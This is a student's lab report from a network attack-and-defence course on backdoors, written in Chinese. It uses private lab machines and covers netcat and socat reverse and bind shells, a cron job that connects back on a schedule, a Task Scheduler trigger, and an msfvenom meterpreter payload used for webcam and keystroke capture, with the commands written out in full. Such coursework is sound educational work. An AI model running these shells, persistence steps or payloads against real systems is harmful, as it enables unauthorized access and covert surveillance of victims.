20154307 《网络对抗技术》实验二 后门原理与实践

20154307 《网络对抗技术》实验二 后门原理与实践#

一、基础问题回答##

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:下载盗版软件或者盗版电影的时候。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:linux的cron启动

(3)Meterpreter有哪些给你映像深刻的功能?

答:怎么说,摄屏这个太吊了,我以后要用胶布把这个摄像头堵住。

(4)如何发现自己有系统有没有被安装后门?

答:杀毒软件吧,直接就把后门的程序杀了。

二、实验内容##

1.使用netcat获取主机操作Shell,cron启动###

(1) Win获得Linux Shell

首先,我们用 ipconfig 查看win的ip地址

ncat监听本机(win)的4307端口

(kali端)用nc kali的ip 端口 -e /bin/sh反弹连接win

然后,在win端就能进行对linux的操作,例如,ls,或者是看ip地址,也为接下来的实验做铺垫

win端ip:192.168.120.132

kali端ip:192.168.120.129

(2) Linux获得Win Shell

(kali端)敲入nc -l -p 端口号打开监听

然后(win端)敲入c:\your_nc_dir>ncat.exe -e cmd.exe linux的ip 端口号,对linux端进行反弹连接

(kali端)输入win的操作即可对win主机进行攻击

(3)使用nc传输数据

win下监听端口4307

(kali端)输入nc linux的ip 端口号,连接win的端口

效果如下:

2.使用socat获取主机操作Shell, 任务计划启动

在win下监听4307的端口

回到linux端,通过crontab -e,选3,进入vim编辑界面,进入插入模式,在最后一行敲入36 * * * * /bin/netcat 192.168.120.132 4307 -e /bin/sh,即在每个点的36分反弹连接win的4307端口,当时正好是34分,所以我输入了36,可以很快看到结果。修改后存盘退出

在win端输入linux的命令,一开始命令不会马上出来,到了你设置的时间点以后,命令和执行结果都会马上出来。

效果如下:

3.使用MSF meterpreter 生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

刚开始用socat时,这是啥?做完实验后,哇这个好叼

在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:

在操作->程序或脚本中选择socat.exe文件的路径,在添加参数一栏填写tcp-listen:端口号 exec:cmd.exe,pty,stderr

设置完成后,锁定win用户(win+L),然后进入win,这时该触发器是运行的

在kali下输入socat - tcp:win的ip:端口号,发现获得了cmd.shell

4.使用MSF meterpreter 生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

kali端输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口号 -f exe > 20154307_backdoor.exe,生成后门程序。(注意此时应该管理win的杀毒软件防火墙等)

在win端和linux端分别输入

Win7:ncat.exe -l > 20154307_backdoor.exe

kali:nc win的ip 端口号 < 20154307_backdoor.exe

在Kali上使用msfconsole指令进入控制台,使用监听模块,设置payload,设置反弹回连的IP和端口

设置完成后,执行监听,打开win上的后门,linux上显示攻击成功

以下是攻击结果###

如此一来,课堂上讲完的实验就做完了

实验小结##

这次的实验非常有意思,让我也体验了一把当黑客的感觉,后们的攻击实在太厉害了,在学习后门攻击的同时我们也应该学会防范这些攻击,保护好个人隐私,同时,平时用不到的端口该关闭也要关闭,下载软件、电影、音乐的时候还是通过正规渠道比较好,不然黑客下一个攻击的就是你

posted @ 2018-03-28 21:10  20154307  阅读(135)  评论(1编辑  收藏